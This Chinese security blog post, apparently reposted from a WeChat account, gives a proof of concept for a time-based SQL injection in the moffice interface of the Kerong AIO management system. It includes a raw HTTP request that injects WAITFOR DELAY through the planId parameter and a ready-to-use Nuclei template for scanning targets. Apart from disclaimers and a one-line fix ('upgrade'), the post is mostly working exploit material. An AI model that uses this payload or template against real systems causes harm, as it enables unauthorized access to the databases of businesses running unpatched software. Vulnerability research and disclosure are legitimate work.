科荣AIO moffice接口 SQL注入漏洞POC

admin
admin
admin
138658
文章
114
评论
2024年7月29日21:29:08评论29 views字数 1297阅读4分19秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。
0X01 简介
科荣AIO管理系统是一款由科荣AIO企业开发的企业管理系统,通过电子商务、手机APP、ERP、OA、CRM、UDP解决众多企业客户在信息化过程中上下游、跨部门、多功能、需求多变等个性化的问题。
漏洞编号:
影响范围:
复现环境:

科荣AIO V7

0X02 漏洞复现
POC:
GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:10'--&sid=1 HTTP/1.1Host: 192.168.31.133:8000User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.31.133:8000/login.jspConnection: closeUpgrade-Insecure-Requests: 1
科荣AIO moffice接口 SQL注入漏洞POC
Nuclei:
id: kerongAIO-sqliinfo:  name: 科荣AIO moffice接口 SQL注入漏洞  author: 紫色皓月  severity: high  description: 科荣AIO moffice接口 SQL注入漏洞  tags: 2024,科荣AIO,sqlirequests:  - raw:    - |      GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:5'--&sid=1 HTTP/1.1      Host: {{Hostname}}      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8      Accept-Language: en-US,en;q=0.5      Accept-Encoding: gzip, deflate      Referer: http://{{Hostname}}/login.jsp      Connection: close      Upgrade-Insecure-Requests: 1    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'duration>=5 && duration<=8 && status_code==200'
科荣AIO moffice接口 SQL注入漏洞POC

0X03 修复建议

升级至安全版本!

0X04

原文始发于微信公众号(皓月的笔记本):【漏洞复现】科荣AIO moffice接口 SQL注入漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月29日21:29:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   科荣AIO moffice接口 SQL注入漏洞POChttps://cn-sec.com/archives/3007344.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息